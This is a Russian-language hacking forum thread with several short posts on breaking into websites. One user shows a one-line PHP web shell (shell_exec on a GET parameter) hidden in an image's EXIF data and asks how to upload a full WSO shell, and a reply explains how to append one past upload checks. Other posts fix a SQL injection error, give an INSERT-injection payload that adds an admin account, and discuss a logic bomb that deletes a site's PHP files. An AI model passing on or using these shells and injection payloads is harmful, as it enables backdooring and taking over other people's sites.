долго я искал возможность через админку залить шелл wso2.php, но никак не получалось, всеми правдами и не правдами к полвторому ночи у меня получилось следующее: имеется файл вида site.com/shell.jpg.php5?r0ng=ls , где shell.jpg - это белый квадрат с поредактированными данными EXIF , где живёт код PHP: <?if($_GET['r0ng']){echo"<pre>".shell_exec($_GET["r0ng"]);}?> .. Вопрос в том, как залить полноценный шелл имя вот эти входные данные, подскажите, пожалуйста
FieryDragon, раз можешь залить файл с произвольным расширением, значит проверка идет только на хидер картингки и может быть, размер. Открываешь через Notepad++ картинку (в которой ты подготовил расширение нужное), мотаешь вниз и в самый конец дописываешь любой свой полноценный шелл.
Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E14) Incorrect syntax near the keyword 'or'.
Все прекрасно выводит: upd Знак "+" урленкодится, поэтому у Вас и происходит эта ошибка. Перехватите пакет и исправьте урленкод.
ребят , на сайте пентестер нашел один файл *.php содержимое такое: Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба ))) насколько это верно? движок сайта - WP.
Ребят подскажите с чего начинать свой путь изучения уязвимостью сайтов, создавать я их научился, продвигать более менее тоже. Теперь хочу дальше развиваться, накидайте кто нить ссылок полезных, можно в ЛС, готов как то отблагодарить.
Все верно, все файлы *.php в текущем каталоге будут удалены. Причем этот файл сам себя удалит, тем самым типа "заметет следы"
Спасибо. а это что за прикол? самописный (от разработчика сайта) или сайт взломали и ставили? просто смысл удаления всех файлов.. хочу понять мотив.
Почти верно, с тем отличием что .php удалятся не "на сайте", а только в той же директории, что и сам файл. Строго говоря, да, это логическая бомба, но очень примитивная и никак не замаскированная. Выше вы упомянули, что сайт на wp. В wp такого кода явно нет, как и "разработчика сайта" в данном случае. Вариантов тут масса, и как уже сказали, это может быть делом рук той мартышки, что ставила вордпресс. >> сайт взломали и ставили? Этот вопрос вам надо задавать "пентестеру", а не здесь. Смотрите логи(что может быть проблемно, если ворпресс на дешевом\херовом шаред-хостинге), смотрите даты и все что есть по сайту. Одно можно сказать наверняка - в вордпрессе такого нет, что очевидно. К тому же, простое удаление особо бесполезно, т.к. бекапы все-таки принято делать. Скорее всего, где-нибудь есть аналогично оставленное выполнение кода.
возможно ли использовать sql инъекцию не только на чтение данных но и на запись ? например заменить хеш пароля на извесный и провести авторизацию в админку
GAiN, инъекции бывают в INSERT/UPDATE - соответственно, да, возможно. Пример, регистрация: Code: $username = $_POST['username']; $password = $_POST['password']; INSERT INTO users ('$username', '$password'); Инъекция: Code: username=...&password=...'),('admin', 'pass')#